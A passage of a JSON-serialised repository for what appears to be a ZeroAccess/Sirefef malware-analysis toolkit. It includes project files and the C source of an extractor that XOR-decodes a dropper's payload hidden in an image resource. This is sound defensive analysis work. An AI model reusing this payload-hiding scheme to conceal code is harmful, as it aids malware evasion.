(UINT)-2;\n            break;\n        }\n\n        g_ConsoleOutput = TRUE;\n        if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n            g_ConsoleOutput = FALSE;\n        }\n\n        SetConsoleTitle(T_SFCHECKTTITLE);\n        SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n        if (g_ConsoleOutput == FALSE) {\n            WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n        }\n\n        uResult = SfProcessCmdLine(GetCommandLine());\n\n        if (g_ConsoleOutput) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFPRESSANYKEY,\n                TRUE, FALSE);\n\n            StdIn = GetStdHandle(STD_INPUT_HANDLE);\n            if (StdIn != INVALID_HANDLE_VALUE) {\n                RtlSecureZeroMemory(&inp1, sizeof(inp1));\n                ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n                ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n            }\n        }\n\n    } while (cond);\n\n    ExitProcess(uResult);\n}\n"
  },
  {
    "path": "Source/Harusame/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        101\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1001\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "Source/Murasame/Murasame.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Murasame</RootNamespace>\n    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>zaextract32</TargetName>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>zaextract64</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  
<ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <StringPooling>true</StringPooling>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      
<FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <StringPooling>true</StringPooling>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\itostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_filename.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strend.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\" />\n    <ClCompile 
Include=\"..\\minirtl\\_strncpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\" />\n    <ClCompile Include=\"..\\shared\\cui.c\" />\n    <ClCompile Include=\"..\\shared\\gdip.c\" />\n    <ClCompile Include=\"..\\shared\\ldr.c\" />\n    <ClCompile Include=\"..\\shared\\md5.c\" />\n    <ClCompile Include=\"..\\shared\\util.c\" />\n    <ClCompile Include=\"main.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\" />\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\" />\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\" />\n    <ClInclude Include=\"..\\minirtl\\_filename.h\" />\n    <ClInclude Include=\"..\\shared\\cui.h\" />\n    <ClInclude Include=\"..\\shared\\gdip.h\" />\n    <ClInclude Include=\"..\\shared\\global.h\" />\n    <ClInclude Include=\"..\\shared\\ldr.h\" />\n    <ClInclude Include=\"..\\shared\\md5.h\" />\n    <ClInclude Include=\"..\\shared\\ntos.h\" />\n    <ClInclude Include=\"..\\shared\\util.h\" />\n    <ClInclude Include=\"..\\shared\\za.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Murasame/Murasame.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{82fc14f9-5afb-45dd-beea-4af99e666148}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"shared\">\n      <UniqueIdentifier>{b3d76b8d-1725-48df-880b-4b354f769687}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\">\n      
<Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\itostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\ldr.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\util.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\md5.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile 
Include=\"..\\shared\\cui.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\gdip.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\global.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ldr.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ntos.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\util.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\md5.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\cui.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\gdip.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Murasame/Murasame.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LocalDebuggerCommandArguments>c:\\malware\\test.bin c:\\malware\\ext.bin 0x7744543A</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>c:\\malware\\test.bin c:\\malware\\ext.bin 0x7744543A</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Murasame/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     1.02\n*\n*  DATE:        01 Dec 2017\n*\n*  Murasame program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n#include \"..\\shared\\gdip.h\"\n\n#include <windows.h>\n#include <Shlwapi.h>\n\n#pragma comment(lib, \"Shlwapi.lib\")\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFEXTRACTTITLE L\"Sirefef/ZeroAccess 3 extractor v1.0 (18/01/16)\"\n#define T_SFEXTRACTUSAGE L\"Usage: zaextract inputfile [outputfile] hexkey\\n\\r\\te.g. 
zaextract dropper.bin extracted.bin 0x12345678\\r\\n\"\n#define T_SFEXTRACTED    L\"File extracted \"\n#define T_SFEXTRACTFAIL  L\"\\r\\nError while extracting file\"\n#define T_SFINITFAILED   L\"Required GDI+ routines cannot be found\"\n#define T_SFPRESSANYKEY  L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfExtractDropper\n*\n* Purpose:\n*\n* Extract Sirefef/ZeroAccess from image resource.\n*\n* CNG variant\n*\n*/\nUINT SfExtractDropper(\n    LPWSTR lpCommandLine\n)\n{\n    BOOL                  cond = FALSE, bSuccess = FALSE;\n    ULONG                 c, uKey = 0, imagesz;\n    WCHAR                 szInputFile[MAX_PATH + 1];\n    WCHAR                 szOutputFile[MAX_PATH + 1];\n    WCHAR                 szKey[MAX_PATH];\n    PVOID                 ImageBase = NULL, EncryptedData = NULL, DecryptedData = NULL;\n    IStream              *pImageStream = NULL;\n    ULONG_PTR             gdiplusToken = 0;\n    GdiplusStartupInput   input;\n    GdiplusStartupOutput  output;\n    PVOID                 BitmapPtr = NULL;\n    GdiPlusBitmapData     BitmapData;\n    GdiPlusRect           rect;\n    SIZE_T                sz;\n    PULONG                ptr, i_ptr;\n\n    //input file\n    c = 0;\n    RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));\n    GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);\n    if (c == 0) {\n        SfcuiPrintText(g_ConOut,\n            T_SFEXTRACTUSAGE,\n            g_ConsoleOutput, FALSE);\n        return (UINT)-1;\n    }\n\n    //output file\n    c = 0;\n    RtlSecureZeroMemory(&szOutputFile, sizeof(szOutputFile));\n    GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szOutputFile, MAX_PATH, &c);\n    if (c == 0) {\n        _strcpy(szOutputFile, TEXT(\"extracted.bin\"));\n    }\n\n    //key\n    c = 0;\n    RtlSecureZeroMemory(&szKey, sizeof(szKey));\n    GetCommandLineParam(lpCommandLine, 3, (LPWSTR)&szKey, MAX_PATH, &c);\n    if ((c == 0) || (c > 10)) {\n        SfcuiPrintText(g_ConOut,\n            
T_SFEXTRACTUSAGE,\n            g_ConsoleOutput, FALSE);\n        return (UINT)-1;\n    }\n\n    c = 0;\n    if (locase_w(szKey[1]) == 'x') {\n        c = 2;\n    }\n    uKey = hextoul(&szKey[c]);\n\n    do {\n\n        ImageBase = SfuCreateFileMappingNoExec(szInputFile);\n        if (ImageBase == NULL)\n            break;\n\n        c = 0;\n        EncryptedData = SfLdrQueryResourceData(1, ImageBase, &c);\n        if ((EncryptedData == NULL) || (c == 0))\n            break;\n\n        pImageStream = SHCreateMemStream((BYTE *)EncryptedData, (UINT)c);\n        if (pImageStream == NULL)\n            break;\n\n        RtlSecureZeroMemory(&input, sizeof(input));\n        RtlSecureZeroMemory(&output, sizeof(output));\n        input.GdiplusVersion = 1;\n\n        if (GdiplusStartup(&gdiplusToken, &input, &output) != GdiplusOk)\n            break;\n\n        BitmapPtr = NULL;\n        if (GdipCreateBitmapFromStream(pImageStream, &BitmapPtr) != GdiplusOk)\n            break;\n\n        RtlSecureZeroMemory(&rect, sizeof(rect));\n\n        if (\n            (GdipGetImageWidth(BitmapPtr, (UINT *)&rect.Width) == GdiplusOk) &&\n            (GdipGetImageHeight(BitmapPtr, (UINT *)&rect.Height) == GdiplusOk)\n            )\n        {\n            RtlSecureZeroMemory(&BitmapData, sizeof(BitmapData));\n            if (GdipBitmapLockBits(BitmapPtr, &rect, ImageLockModeRead, PixelFormat32bppARGB, &BitmapData) == GdiplusOk) {\n\n                c = (rect.Width * rect.Height);\n\n                imagesz = sizeof(ULONG) * c;\n                sz = imagesz;\n                DecryptedData = NULL;\n                NtAllocateVirtualMemory(NtCurrentProcess(), &DecryptedData, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n                if (DecryptedData) {\n\n                    i_ptr = (PULONG)BitmapData.Scan0;\n                    ptr = DecryptedData;\n                    while (c > 0) {\n                        *ptr = *i_ptr ^ uKey;\n                        ptr++;\n                     
   i_ptr++;\n                        c--;\n                    }\n\n                    bSuccess = (SfuWriteBufferToFile(szOutputFile, DecryptedData, imagesz, FALSE, FALSE) == imagesz);\n\n                    sz = 0;\n                    NtFreeVirtualMemory(NtCurrentProcess(), &DecryptedData, &sz, MEM_RELEASE);\n                }\n                GdipBitmapUnlockBits(BitmapPtr, &BitmapData);\n            }\n        }\n\n    } while (cond);\n\n    if (bSuccess == FALSE) {\n        SfcuiPrintText(g_ConOut,\n            T_SFEXTRACTFAIL,\n            g_ConsoleOutput, FALSE);\n    }\n    else\n    {\n        SfcuiPrintText(g_ConOut,\n            szOutputFile,\n            g_ConsoleOutput, TRUE);\n        SfcuiPrintText(g_ConOut,\n            T_SFEXTRACTED,\n            g_ConsoleOutput, TRUE);\n    }\n\n    if (BitmapPtr != NULL) {\n        //dispose the image object itself, not the address of the local pointer\n        GdipDisposeImage(BitmapPtr);\n    }\n\n    if (gdiplusToken != 0) {\n        GdiplusShutdown(gdiplusToken);\n    }\n\n    if (pImageStream != NULL) {\n        pImageStream->lpVtbl->Release(pImageStream);\n    }\n\n    if (ImageBase != NULL) {\n        NtUnmapViewOfSection(NtCurrentProcess(), ImageBase);\n    }\n\n    //report extraction failure through the process exit code\n    return (bSuccess) ? 0 : (UINT)-1;\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Murasame main.\n*\n*/\nvoid SfMain(\n    VOID\n)\n{\n    BOOL         cond = FALSE;\n    UINT         uResult = 0;\n    DWORD        dwTemp;\n    HANDLE       StdIn;\n    INPUT_RECORD inp1;\n\n    __security_init_cookie();\n\n    do {\n\n        g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n        if (g_ConOut == INVALID_HANDLE_VALUE) {\n            uResult = (UINT)-1;\n            break;\n        }\n\n        g_ConsoleOutput = TRUE;\n        if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n            g_ConsoleOutput = FALSE;\n        }\n\n        SetConsoleTitle(T_SFEXTRACTTITLE);\n        SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n        if (g_ConsoleOutput == FALSE) {\n            WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), 
&dwTemp, NULL);\n        }\n\n        if (SfInitGdiPlus()) {\n            uResult = SfExtractDropper(GetCommandLine());\n        }\n        else {\n            SfcuiPrintText(g_ConOut,\n                T_SFINITFAILED,\n                g_ConsoleOutput, FALSE);\n        }\n\n        if (g_ConsoleOutput) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFPRESSANYKEY,\n                TRUE, FALSE);\n\n            StdIn = GetStdHandle(STD_INPUT_HANDLE);\n            if (StdIn != INVALID_HANDLE_VALUE) {\n                RtlSecureZeroMemory(&inp1, sizeof(inp1));\n                ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n                ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n            }\n        }\n\n    } while (cond);\n\n    ExitProcess(uResult);\n}\n"
  },
  {
    "path": "Source/Murasame/resource.h",
